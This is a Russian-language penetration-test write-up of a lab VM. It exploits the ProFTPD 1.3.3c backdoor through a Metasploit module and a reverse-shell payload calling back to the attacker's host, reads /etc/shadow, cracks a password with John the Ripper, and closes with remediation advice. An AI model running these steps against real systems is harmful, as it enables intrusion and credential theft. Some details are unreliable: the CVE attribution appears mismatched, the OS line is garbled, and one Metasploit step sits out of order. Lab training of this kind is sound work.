
Прохождение пентеста уязвимой виртуальной машины Ubuntu. Эксплуатация бэкдора ProFTPD 1.3.3c (CVE-2010-4221) позволила получить root-доступ и захватить флаг. Включает разведку с помощью Nmap, настройку пейлоада в Metasploit и взлом хэшей пользователей (John the Ripper).
Лаборатория offensive security : Эксплойт бэкдора ProFTPD 1.3.3c (флаг root)
В этом отчете описан пентест, проведенный на уязвимой виртуальной машине (VM) под управлением Linux, с акцентом на выявление опасной уязвимости сервиса, позволившей получить немедленный root-доступ.
| Деталь | Значение |
|---|---|
| IP-адрес цели | [ 192.168.222.130] |
| IP-адрес атакующего (LHOST) | [ 192.168.222.128] |
| ОС цели | Ubuntu 4ubuntu2.2 (ядро Linux 3.x) |
| Цель | Получить shell с root-правами и извлечь файл флага. |
Первоначальная разведка включала сканирование сервисов с помощью Nmap для определения открытых портов и версий служб.
Команда:
sudo nmap -sS -sV 192.168.222.130
Ключевые результаты:
| Порт | Сервис | Версия | Риск | | :--- | :--- | :--- | :---
| 21/tcp | ftp | ProFTPD 1.3.3c | КРИТИЧЕСКИЙ (эксплуатируемый бэкдор) |
| 22/tcp | ssh | OpenSSH 7.2p2 | Низкий (стандартный сервис) |
| 80/tcp | http | Apache httpd 2.4.18 | Низкий (очевидных веб-уязвимостей не найдено) |
Последующее сканирование с помощью скриптов уязвимостей подтвердило наличие крайне опасного бэкдора в FTP-сервисе.
Вывод Nmap-скрипта явно показал выполнение команд от имени root:
| ftp-proftpd-backdoor:
| Эта установка содержит бэкдор.
| Команда: id
|_ Результаты: uid=0(root) gid=0(root) groups=0(root)...
3. Эксплуатация уязвимости и получение root-shell
Для эксплуатации подтвержденного бэкдора ProFTPD использовался Metasploit Framework.
Шаги эксплуатации:
Запустить Metasploit: msfconsole
Выбрать модуль эксплойта: use exploit/unix/ftp/proftpd_133c_backdoor
Задать параметры:
Bash
set RHOSTS 192.168.222.130
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.222.128
Результат: сессия командной оболочки была успешно установлена, предоставив немедленные root-привилегии (uid=0).
4. Пост-эксплуатация и получение флага
Сбор учетных данных
Хеши пользователей системы были извлечены из /etc/shadow для пост-эксплуатационного анализа. Хеш пользователя marlinspike был успешно взломан с помощью John the Ripper.
Используемая команда (на машине атакующего):
Bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Взломанные учетные данные:
Пользователь: marlinspike
Пароль: marlinspike
5. Рекомендации по устранению уязвимостей
Уровень безопасности системы крайне низок из-за скомпрометированного FTP-сервиса. Необходимо немедленно принять меры для защиты системы:
Немедленное обновление/исправление: сервис ProFTPD должен быть немедленно пропатчен или обновлен до безопасной версии (новее 1.3.3g), чтобы устранить известный бэкдор и связанные CVE.
Удаление сервиса: если FTP не требуется для работы системы, сервис должен быть полностью удален.
Межсетевой экран: внедрить строгие правила файрвола (iptables/ufw) для блокировки внешнего доступа к порту 21.
Безопасная конфигурация SSH: пересмотреть конфигурацию SSH, чтобы отключить вход под root и требовать аутентификацию по ключам.
Выполнить: exploit